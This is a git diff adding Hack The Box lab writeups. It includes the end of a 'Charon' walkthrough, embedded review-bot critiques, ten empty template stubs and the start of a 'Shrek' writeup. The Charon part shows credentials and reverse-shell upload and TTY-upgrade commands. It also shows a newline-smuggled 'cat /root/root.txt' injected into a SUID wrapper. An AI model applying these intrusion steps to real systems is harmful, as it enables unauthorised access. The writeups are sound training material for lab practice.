+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 0b0689ba94f94533400f4decd87fa260
+
+ Possible Hashs:
+ [+] MD5
+ [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
+
+
+And we see that it is a md5 hash, we can use john or hashcat in conjunction with wordlists, but for this example we'll just use an online hash cracker: https://www.onlinehashcrack.com
+
+ 
+
+And finally we have the credentials **super_cms_adm:tamarro** So we use them to login:
+
+
+
+Once logged in we see a big red flag, we are able to upload an image, so we'll try to inject a reverse shell there:
+
+
+
+So here let's make our own simple php reverse shell:
+
+
+
+But when we upload it we see that we need to make sure the file extension is correct:
+
+
+
+So let's disguise our reverse php shell as a gif, making sure the magicbytes are also correct:
+
+ 
+
+Here we see 2 interesting things once we upload our reverse php gif : we get the **relative** path of our gif : ../images/nothing.php.gif and a hidden input with a b64 name
+
+
+
+Unsure as to what to do with that, we'll just try to access our reverse php gif and get a reverse shell:
+
+ 
+
+Now that we see our reverse php gif not working, that's where we know we have to make use of this "testfile1" which is a new imput field to the form named testfile1 and setting the value to writeup.php, causes the page to rename the uploaded file to the value specified. So let's intercept the upload.php webpage itself in bursuite, in order to modify the php file itself,in order to have a the new "testfile1" input field:
+
+
+
+Now that we have the request, we do Action > Do intercept > Response to this Request and then just hit "forward"
+
+
+
+Then we make sure the other input field is uncommented and named properly and forward the request:
+
+
+
+This allows us to submit a gif file to then rename it to a php file, so let's submit it and browse to it:
+
+
+
+It uploads successfully so let's browse to it at **http://10.10.10.31/images/nothing.php** :
+
+
+
+And there we have a reverse shell as www-data ! now let's poke around but before that let's upgrade our reverse shell to a fully interactive one:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ which python
+ which python
+ /usr/bin/python
+
+
+Python is there for us to use, so let's use the pty module to spawn a TTY shell:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@charon:/var/www/html/freeeze/images$ ^Z
+ [1]+ Stopped nc -lvnp 9001
+
+ [ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
+ → stty raw -echo
+
+ [ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 9001
+
+ www-data@charon:/var/www/html/freeeze/images$
+ www-data@charon:/var/www/html/freeeze/images$
+ www-data@charon:/var/www/html/freeeze/images$
+
+
+once we got the tty shell from python, we background our netcat process with CTRL+Z then type in stty raw -echo and then **fg** to get back into our netcat reverse shell and we now have our fully interactive reverse shell:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ ls -lash
+ ls -lash
+ total 904K
+ 4.0K drwxr-xrwx 3 root root 4.0K Aug 13 14:43 .
+ 4.0K drwxr-xrwx 8 root root 4.0K Jun 26 2017 ..
+ 72K -rwxr-xr-x 1 root root 72K Dec 23 2016 berries.png
+ 4.0K -rwxr-xr-x 1 root root 1.2K Dec 23 2016 bg-border.gif
+ 64K -rwxr-xr-x 1 root root 62K Dec 23 2016 bg-header-about.jpg
+ 152K -rwxr-xr-x 1 root root 152K Dec 23 2016 bg-home.jpg
+ 4.0K -rwxr-xr-x 1 root root 994 Dec 23 2016 bg-transparent.png
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blackberry.jpg
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blueberry.jpg
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 cantaloupe.jpg
+ 4.0K -rwxr-xr-x 1 root root 2.7K Dec 23 2016 check-in.png
+ 4.0K -rwxr-xr-x 1 root root 3.7K Jun 23 2017 f.png
+ 24K -rwxr-xr-x 1 root root 21K Dec 23 2016 grapes.jpg
+ 24K -rwxr-xr-x 1 root root 21K Dec 23 2016 green-apple.jpg
+ 16K -rwxr-xr-x 1 root root 13K Dec 23 2016 icons.png
+ 20K -rwxr-xr-x 1 root root 17K Dec 23 2016 kiwi.jpg
+ 8.0K -rwxr-xr-x 1 root root 7.1K Jun 23 2017 logo.png
+ 20K -rwxr-xr-x 1 root root 18K Dec 23 2016 mango.jpg
+ 60K -rwxr-xr-x 1 root root 60K Dec 23 2016 map.jpg
+ 4.0K drwxr-xr-x 2 root root 4.0K Dec 23 2016 mobile
+ 84K -rwxr-xr-x 1 root root 82K Dec 23 2016 new-chills.png
+ 4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 14:43 nothing.php
+ 4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 13:56 nothing.php.gif
+ 84K -rwxr-xr-x 1 root root 82K Dec 23 2016 on-diet.png
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 pineapple.jpg
+ 4.0K -rw-r--r-- 1 www-data www-data 103 Jun 26 2017 small.png
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 strawberry.jpg
+ 116K -rwxr-xr-x 1 root root 116K Dec 23 2016 strwberry-delights.jpg
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 yogurt.jpg
+
+
+ www-data@charon:/var/www/html/freeeze/images$ cd /home/
+ www-data@charon:/home$ ls
+ decoder
+ www-data@charon:/home$ cd decoder/
+ www-data@charon:/home/decoder$ ls -lash
+ total 40K
+ 4.0K drwxr-xr-x 3 decoder freeeze 4.0K Jun 26 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jun 23 2017 ..
+ 4.0K -rw-r--r-- 1 decoder freeeze 220 Sep 1 2015 .bash_logout
+ 4.0K -rw-r--r-- 1 decoder freeeze 3.7K Jun 25 2017 .bashrc
+ 4.0K drwx------ 2 decoder freeeze 4.0K Jun 23 2017 .cache
+ 4.0K -rw-r--r-- 1 decoder freeeze 654 Jun 25 2017 .profile
+ 4.0K -rw------- 1 decoder freeeze 601 Jun 26 2017 .viminfo
+ 4.0K -rw-r--r-- 1 decoder freeeze 138 Jun 23 2017 decoder.pub
+ 4.0K -rw-r--r-- 1 decoder freeeze 32 Jun 23 2017 pass.crypt
+ 4.0K -r-------- 1 decoder freeeze 33 Jun 23 2017 user.txt
+ www-data@charon:/home/decoder$ cat user.txt
+ cat: user.txt: Permission denied
+ www-data@charon:/home/decoder$ file decoder.pub && file pass.crypt
+ decoder.pub: ASCII text
+ pass.crypt: data
+ www-data@charon:/home/decoder$
+
+
+
+after poking around a bit we found out that we (www-data) couldn't read the user flag, but we have access to decoder.pub and pass.crypt
+
+
+ www-data@charon:/home/decoder$ cat decoder.pub
+ -----BEGIN PUBLIC KEY-----
+ MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhALxHhYGPVMYmx3vzJbPPAEa10NETXrV3
+ mI9wJizmFJhrAgMBAAE=
+ -----END PUBLIC KEY-----
+
+ www-data@charon:/home/decoder$ cat pass.crypt
+ 2OSb"eWgTo7I
+
+
+
+So let's just save both locally (it's easy since they are small files, you can just copy paste them into nano)
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → ls
+ nothing.php.gif
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → wget http://10.10.10.31:9999/decoder.pub
+ --2020-08-13 15:50:36-- http://10.10.10.31:9999/decoder.pub
+ Connecting to 10.10.10.31:9999... ^C
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → nano decoder.pub
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → nano pass.crypt
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → ls -lash
+ total 24K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 13 15:52 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Aug 13 14:34 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 138 Aug 13 15:51 decoder.pub
+ 4.0K -rw-r--r-- 1 nothing nothing 83 Aug 13 15:19 nothing.php.gif
+ 4.0K -rw-r--r-- 1 nothing nothing 1.0K Aug 13 15:18 .nothing.php.gif.swp
+ 4.0K -rw-r--r-- 1 nothing nothing 13 Aug 13 15:52 pass.crypt
+
+
+
+Here we'll crack the weak RSA key using RsaCtfTool.py:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
+ →/opt/RsaCtfTool/RsaCtfTool.py --publickey decoder.pub --uncipher pass.crypt
+ [+] Clear text : nevermindthebollocks
+
+
+And we have decoder's password! so let's login via ssh as the decoder user:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
+ → ssh decoder@10.10.10.31
+ The authenticity of host '10.10.10.31 (10.10.10.31)' can't be established.
+ ECDSA key fingerprint is SHA256:V1uA1jbcL+1r8UE/foqVjb2u9rSiGTP6EB1Q374Zp9o.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.31' (ECDSA) to the list of known hosts.
+ decoder@10.10.10.31's password:
+ Permission denied, please try again.
+ decoder@10.10.10.31's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 34 packages can be updated.
+ 23 updates are security updates.
+
+
+ $ id
+ uid=1001(decoder) gid=1001(freeeze) groups=1001(freeeze)
+ $ cat user.txt
+ 0fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+To be able to read the root flag, we first need to privesc, so we find the files with the SUID bit set and find a file called supershell in /usr/local/bin directory
+
+
+ $ find / -perm -4000 2>/dev/null
+ **/usr/local/bin/supershell**
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/snapd/snap-confine
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/bin/pkexec
+ /usr/bin/sudo
+ /usr/bin/chfn
+ /usr/bin/newgrp
+ /usr/bin/gpasswd
+ /usr/bin/chsh
+ /usr/bin/passwd
+ /usr/bin/at
+ /usr/bin/newgidmap
+ /usr/bin/newuidmap
+ /bin/ntfs-3g
+ /bin/ping6
+ /bin/mount
+ /bin/fusermount
+ /bin/umount
+ /bin/ping
+ /bin/su
+
+
+When we run this binary we find that we can run any shell command using it. So we can use it to open the root.txt file:
+
+
+
+ $ supershell "/bin/ls$/
+ > cat /root/root.txt
+ > "
+ Supershell (very beta)
+ ++[/bin/ls$/
+ cat /root/root.txt
+ ]
+ sh: 1: /bin/ls$/: not found
+ c5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to read the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
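Review bot: the pass.crypt transfer shown in the nano block cannot be the file that was actually decrypted: on the target, `ls -lash` in /home/decoder reports pass.crypt as 32 bytes, but the local copy after `nano pass.crypt` is 13 bytes. A 256-bit RSA ciphertext is exactly 32 bytes and mostly non-printable, so pasting `cat` output through a terminal drops most of it; the writeup should show how the file was really moved intact (for example `base64 -w0 pass.crypt` on the box and `base64 -d` locally, or the HTTP fetch on port 9999 that is started and then aborted in the transcript). In the same section, say why the key is weak instead of just "weak RSA key": decoder.pub is 138 bytes and its modulus INTEGER is 33 bytes long (`AiEA...`, one leading zero byte plus 32 bytes), i.e. a 256-bit modulus, which is why RsaCtfTool factors it almost instantly; that is the point a reader should take away. Two formatting points: the lines "` charo" and "` " are leftover image-placeholder fragments from the template and render as stray backticks, and "man things", "imput" and "bursuite" are typos. Finally, the supershell paragraph says "we can run any shell command using it" without naming the defect the transcript makes visible: the SUID wrapper passes its argument to `sh` unmodified, so the newline inside the quoted argument is executed as a second command (`sh: 1: /bin/ls$/: not found` followed by the file contents). Stating that the root cause is a privileged wrapper invoking a shell on untrusted input makes both the bug and its fix clear.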
diff --git a/Hard/30.md b/Hard/30.md
new file mode 100644
index 0000000..17ae6b1
--- /dev/null
+++ b/Hard/30.md
@@ -0,0 +1,66 @@
+# ForwardSlash Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
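Review bot: this file is an unfilled template: every section body is the literal placeholder "the text goes here", the nmap commands target the placeholder 10.10.10.1 with `-p1,2`, and no scan output is included. Either keep the stub out of the commit until the box is written up or mark the file as a draft in its title so the repository index does not list it as a finished writeup. The same applies verbatim to Hard/31.md through Hard/39.md in this commit. Two smaller points on the shared template text that every writeup inherits: "-sU to for udp ports" has a stray "to", and `--max-retries 0` on the full `-sTU -p-` sweep means dropped probes are never resent, so the template should note that the port list it produces can be incomplete and that the follow-up `-sCV` scan is the authoritative one.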
diff --git a/Hard/31.md b/Hard/31.md
new file mode 100644
index 0000000..92cce74
--- /dev/null
+++ b/Hard/31.md
@@ -0,0 +1,66 @@
+# Quick Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/32.md b/Hard/32.md
new file mode 100644
index 0000000..4dbc0cf
--- /dev/null
+++ b/Hard/32.md
@@ -0,0 +1,66 @@
+# Travel Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/33.md b/Hard/33.md
new file mode 100644
index 0000000..d1dc6de
--- /dev/null
+++ b/Hard/33.md
@@ -0,0 +1,66 @@
+# Blackfield Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/34.md b/Hard/34.md
new file mode 100644
index 0000000..9c7b9a8
--- /dev/null
+++ b/Hard/34.md
@@ -0,0 +1,66 @@
+# Intense Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/35.md b/Hard/35.md
new file mode 100644
index 0000000..44be1f5
--- /dev/null
+++ b/Hard/35.md
@@ -0,0 +1,66 @@
+# Unbalanced Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/36.md b/Hard/36.md
new file mode 100644
index 0000000..2ac45c3
--- /dev/null
+++ b/Hard/36.md
@@ -0,0 +1,66 @@
+# Feline Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/37.md b/Hard/37.md
new file mode 100644
index 0000000..85a7950
--- /dev/null
+++ b/Hard/37.md
@@ -0,0 +1,66 @@
+# Compromised Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/38.md b/Hard/38.md
new file mode 100644
index 0000000..dbe22c7
--- /dev/null
+++ b/Hard/38.md
@@ -0,0 +1,66 @@
+# Reel2 Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/39.md b/Hard/39.md
new file mode 100644
index 0000000..c259964
--- /dev/null
+++ b/Hard/39.md
@@ -0,0 +1,66 @@
+# Sharp Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/4.md b/Hard/4.md
new file mode 100644
index 0000000..2739444
--- /dev/null
+++ b/Hard/4.md
@@ -0,0 +1,636 @@
+# Shrek Writeup
+
+
+
+## Introduction :
+
+Shrek is a hard linux box released back in august 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.47 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.47
+ Discovered open port 22/tcp on 10.10.10.47
+ Discovered open port 21/tcp on 10.10.10.47
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.47
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 19:04 BST
+ Nmap scan report for 10.10.10.47
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 2d:a7:95:95:5d:dd:75:ca:bc:de:36:2c:33:f6:47:ef (RSA)
+ | 256 b5:1f:0b:9f:83:b3:6c:3b:6b:8b:71:f4:ee:56:a8:83 (ECDSA)
+ |_ 256 1f:13:b7:36:8d:cd:46:6c:29:6d:be:e4:ab:9c:24:5b (ED25519)
+ 80/tcp open http Apache httpd 2.4.27 ((Unix))
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Apache/2.4.27 (Unix)
+ |_http-title: Home
+ Service Info: OS: Unix
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan says that port 80 is opened, so let's investigate it:
+
+
+
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "xml,php,html,js,txt" -u http://10.10.10.47/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.47/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,xml,php,html,js
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/10 19:08:04 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /uploads (Status: 301)
+ /upload.php (Status: 200)
+ /upload.html (Status: 200)
+ /About.html (Status: 200)
+ /Index.html (Status: 200)
+ /Gallery.html (Status: 200)
+ /Sitemap.html (Status: 200)
+ /memes (Status: 301)
+ /shrek (Status: 301)
+
+
+
+so the interesting webpages here are /uploads.html and /uploads.php:
+
+
+
+When we upload any file there we get redirected to /uploads.php:
+
+
+
+Looking at /uploads we get a directory listing which contains a bunch of malware but the timestamps show us that it's probably not going to help us:
+
+
+
+The interesting file to lookat here is secret_ultimate.php:
+
+
+
+However we don't get to see the php comments, so we hit CTRL+U to view the sourcecode:
+
+
+
+Which hints us to the /secret_area_51/ directory:
+
+
+
+So apparently we get a mp3 containing some music, but the trick here was to inspect the end of the song because there was some extra static in the end after the music fades out:
+
+
+
+The trick here was to inspect this static in Spectogram:
+
+
+
+Here we see something interesting at the top of the stereo channels under spectogram settings we increase the max frequency times 10 which reveals the following message:
+
+ 
+
+And looks like we got ftp credentials! **donkey:d0nk3y1337!** so we login via ftp:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Shrek]
+ → ftp 10.10.10.47
+ Connected to 10.10.10.47.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.47:nothing): donkey
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ -rw-r--r-- 1 0 0 9216 Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
+ -rw-r--r-- 1 0 0 11264 Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
+ -rw-r--r-- 1 0 0 14336 Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
+ -rw-r--r-- 1 0 0 15390 Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
